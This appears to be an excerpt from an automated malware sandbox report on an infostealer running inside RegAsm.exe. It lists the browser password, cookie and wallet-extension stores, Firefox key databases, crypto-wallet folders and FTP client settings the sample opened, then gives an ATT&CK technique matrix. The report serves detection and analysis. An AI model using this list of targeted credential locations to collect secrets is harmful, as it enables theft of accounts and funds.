              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\VLZDGUKUTZJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\BPMLNOBVSBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\NWTVCDUMOBJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDirectory queried: C:\Users\user\Documents\WUTJSCBCFXJump to behavior

              Remote Access Functionality

              barindex
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Windows Management Instrumentation
              1
              DLL Side-Loading
              1
              DLL Side-Loading
              11
              Deobfuscate/Decode Files or Information
              2
              OS Credential Dumping
              11
              File and Directory Discovery
              Remote Services1
              Archive Collected Data
              11
              Ingress Tool Transfer
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts1
              Native API
              Boot or Logon Initialization Scripts311
              Process Injection
              31
              Obfuscated Files or Information
              LSASS Memory23
              System Information Discovery
              Remote Desktop Protocol41
              Data from Local System
              21
              Encrypted Channel
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)Logon Script (Windows)1
              DLL Side-Loading
              Security Account Manager121
              Security Software Discovery
              SMB/Windows Admin Shares1
              Email Collection
              3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts1
              Command and Scripting Interpreter
              Login HookLogin Hook1
              Masquerading
              NTDS1
              Process Discovery
              Distributed Component Object Model2
              Clipboard Data
              124
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud Accounts2
              PowerShell
              Network Logon ScriptNetwork Logon Script121
              Virtualization/Sandbox Evasion
              LSA Secrets121
              Virtualization/Sandbox Evasion
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts311
              Process Injection
              Cached Domain Credentials1
              Application Window Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
